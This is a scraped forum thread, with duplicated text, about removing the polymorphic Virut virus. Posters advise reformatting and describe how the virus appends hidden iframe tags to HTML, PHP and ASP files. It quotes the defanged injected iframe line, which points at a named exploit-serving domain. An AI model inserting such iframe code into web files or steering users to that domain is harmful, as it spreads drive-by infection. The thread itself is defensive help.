Solve : Re: Cannot remove this virus which started with Win32:JunkPoly

1.	Solve : Re: Cannot remove this virus which started with Win32:JunkPoly [Cryp]?
Answer» This is why my first and only suggestion when I see virut is to reformat and reinstall. Until then you can never be sure if the computer is clean or not. Stay away from warez. It only takes one click and it's all over...Virut ADDS one or more iFrame tags to any html file it finds to redirect users to an exploit site. Edit any html file on the INFECTED computer and you'll see something like this at the bottom: Code: [Select]<- iframe src="http://ZieF,pl/rc/" width=1 height=1 style="border:'<- / iframe>',0Dh,0Ah Virut makes similar changes to other file types such as .PHP, .ASP and .HTM, and is very hard for scanners to detect. So FYI don't bring web documents over in the backup when this infection finally brings you to your knees. The most damning property of Virut is that it is polymorphic- it changes slightly with each replication, allowing some of the files infected to elude scanners. So if you scan your system with a boot cd repeatedly and follow up with a repair install, you may get virut to low for a while, but there is likely a file somewhere on your machine that will inevitably be activated before long, starting the entire infection over again. Trying to remove Virut is an EFFORT in futility, which is why evilfantasy and virtually every other malware expert who has experience with this infection will tell you that your only option is to reformat and reinstall, and to be careful what you transfer from your previous installation. But feel free to keep trying. You'll just end up learning the hard way like I did. Great post astrosoup and WELCOME to CH. Quote from: evilfantasy on April 23, 2009, 12:58:19 PM Great post astrosoup and welcome to CH. That site is known to give you Bloodhound.Exploit.196, is blocked by google and is rated extremely poorly on WOT...(link from googling http://ZieF.pl/rc/ that link doesn't go to the site for safety reasons) For more information go to http://www.google.com/safebrowsing/diagnostic?site=http://zief.pl/rc/&hl=en Visiting a site that has been injected with the iframe code while currently using the NoScript addon for firefox will not affect you as NoScript BLOCKS iframes. But going to the actual website will infect you...I wonder if viewing the page source will get me infected...It's definitely a nasty site. Does a LOT of damage. http://www.threatexpert.com/report.aspx?md5=71eb4db6da3338655c1ec3cb48489d03 Quote from: astrosoup on April 23, 2009, 12:54:04 PM So if you scan your system with a boot cd repeatedly and follow up with a repair install, you may get virut to low for a while, but there is likely a file somewhere on your machine that will inevitably be activated before long, starting the entire infection over again. Like I said, I did not perform a reinstall and deleted all the files from the previous system. The current system is a fresh install and I previously formated the current system partition. All I did I kept other files, which were not infected according to kaspersky tool. Quote from: astrosoup on April 23, 2009, 12:54:04 PM Virut adds one or more iFrame tags to any html file it finds to redirect users to an exploit site. Edit any html file on the infected computer and you'll see something like this at the bottom: Code: [Select]<- iframe src="http://ZieF,pl/rc/" width=1 height=1 style="border:'<- / iframe>',0Dh,0Ah Virut makes similar changes to other file types such as .PHP, .ASP and .HTM, and is very hard for scanners to detect. So FYI don't bring web documents over in the backup when this infection finally brings you to your knees. The iFrame problem, mentioned in an earlier post, happened on my wife's computer, while browsing. It was not a web file on the computer and avast blocked access to that page. That computer was not infected and I scanned it just in case [no sign of virut found, like I said]. Quote from: astrosoup on April 23, 2009, 12:54:04 PM But feel free to keep trying. You'll just end up learning the hard way like I did If I get it again, from the files I have on my computer, I will let you know. But I'm not ready to throw all I have as long as I don't have a reason just yet. I would delete infected files, but not those found not to be infected. Maybe I'm wrong, maybe not. I'll see and let u know.

Solve : Re: Cannot remove this virus which started with Win32:JunkPoly [Cryp]?

Answer»

This is why my first and only suggestion when I see virut is to reformat and reinstall. Until then you can never be sure if the computer is clean or not.

Stay away from warez. It only takes one click and it's all over...Virut ADDS one or more iFrame tags to any html file it finds to redirect users to an exploit site.

Edit any html file on the INFECTED computer and you'll see something like this at the bottom:

Code: [Select]<- iframe src="http://ZieF,pl/rc/" width=1 height=1 style="border:'<- / iframe>',0Dh,0Ah
Virut makes similar changes to other file types such as .PHP, .ASP and .HTM, and is very hard for scanners to detect. So FYI don't bring web documents over in the backup when this infection finally brings you to your knees.

The most damning property of Virut is that it is polymorphic- it changes slightly with each replication, allowing some of the files infected to elude scanners. So if you scan your system with a boot cd repeatedly and follow up with a repair install, you may get virut to low for a while, but there is likely a file somewhere on your machine that will inevitably be activated before long, starting the entire infection over again.

Trying to remove Virut is an EFFORT in futility, which is why evilfantasy and virtually every other malware expert who has experience with this infection will tell you that your only option is to reformat and reinstall, and to be careful what you transfer from your previous installation.

But feel free to keep trying. You'll just end up learning the hard way like I did.
Great post astrosoup and WELCOME to CH. Quote from: evilfantasy on April 23, 2009, 12:58:19 PM

Great post astrosoup and welcome to CH.

That site is known to give you Bloodhound.Exploit.196, is blocked by google and is rated extremely poorly on WOT...(link from googling http://ZieF.pl/rc/ that link doesn't go to the site for safety reasons)

For more information go to http://www.google.com/safebrowsing/diagnostic?site=http://zief.pl/rc/&hl=en

Visiting a site that has been injected with the iframe code while currently using the NoScript addon for firefox will not affect you as NoScript BLOCKS iframes. But going to the actual website will infect you...I wonder if viewing the page source will get me infected...It's definitely a nasty site. Does a LOT of damage. http://www.threatexpert.com/report.aspx?md5=71eb4db6da3338655c1ec3cb48489d03
Quote from: astrosoup on April 23, 2009, 12:54:04 PM

So if you scan your system with a boot cd repeatedly and follow up with a repair install, you may get virut to low for a while, but there is likely a file somewhere on your machine that will inevitably be activated before long, starting the entire infection over again.

Like I said, I did not perform a reinstall and deleted all the files from the previous system. The current system is a fresh install and I previously formated the current system partition. All I did I kept other files, which were not infected according to kaspersky tool.

Quote from: astrosoup on April 23, 2009, 12:54:04 PM

Virut adds one or more iFrame tags to any html file it finds to redirect users to an exploit site.

Edit any html file on the infected computer and you'll see something like this at the bottom:

Code: [Select]<- iframe src="http://ZieF,pl/rc/" width=1 height=1 style="border:'<- / iframe>',0Dh,0Ah
Virut makes similar changes to other file types such as .PHP, .ASP and .HTM, and is very hard for scanners to detect. So FYI don't bring web documents over in the backup when this infection finally brings you to your knees.

The iFrame problem, mentioned in an earlier post, happened on my wife's computer, while browsing. It was not a web file on the computer and avast blocked access to that page. That computer was not infected and I scanned it just in case [no sign of virut found, like I said].

Quote from: astrosoup on April 23, 2009, 12:54:04 PM

But feel free to keep trying. You'll just end up learning the hard way like I did

If I get it again, from the files I have on my computer, I will let you know. But I'm not ready to throw all I have as long as I don't have a reason just yet. I would delete infected files, but not those found not to be infected. Maybe I'm wrong, maybe not. I'll see and let u know.

Solve : Re: Cannot remove this virus which started with Win32:JunkPoly [Cryp]?

Discussion

No Comment Found

Related InterviewSolutions

Reply to Comment